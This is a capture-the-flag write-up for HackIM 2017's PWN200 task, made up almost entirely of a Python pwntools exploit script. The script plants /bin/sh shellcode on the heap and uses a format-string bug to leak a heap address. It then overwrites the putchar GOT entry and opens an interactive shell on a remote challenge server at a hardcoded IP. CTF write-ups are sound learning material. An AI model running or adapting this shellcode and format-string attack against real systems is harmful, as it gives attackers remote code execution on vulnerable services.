Rating:

# HACKIM CTF - 2017
# Task: PWN200
# Author: Azz-Eddine DJEKMANI

from pwn import *
from libformatstr import *
#context.log_level = "debug"

buffsize = 100
shellcode = "\x31\xc0\xb0\x30\x01\xc4\x30\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\xb0\xb0\xc0\xe8\x04\xcd\x80\xc0\xe8\x03\xcd\x80"
putchar = 0x0804b038 # putchar.got.plt

cnx = remote("34.198.96.6" , 9001)

# Inject shellcode on the heap
cnx.recv()
cnx.sendline("1")
cnx.recv()
cnx.sendline(shellcode)
cnx.recv()
cnx.sendline("1")
cnx.recv()

# Get format string vulnerability offset and padding
cnx.sendline("3")
cnx.recv()
cnx.sendline(make_pattern(buffsize))
data = cnx.recv()
offset,padding = guess_argnum(data[16:] , buffsize)
print "[+] Padding: " + str(padding)
print "[+] 0ffset: " + str(offset)

# Leak Heap_addresse using fmt vuln
cnx.sendline("3")
cnx.recv()
cnx.sendline('\x54\xb0\x04\x08%11$s') # leak book_list@bss
leaked = cnx.recv()
leaked_addr = u32(leaked[20:24])

#build payload
p = FormatStr(buffsize)
p[putchar] = leaked_addr
print "[+] Shellcode Addresse: " + hex(leaked_addr)
payload = p.payload(offset , padding)

# Send payload and get the shell
cnx.sendline("3")
cnx.recv()
cnx.send(payload)
cnx.interactive("PWNED# ")

Original writeup (https://gist.github.com/djekmani/cb2c85e199b0c58293a1d9bc3745c569).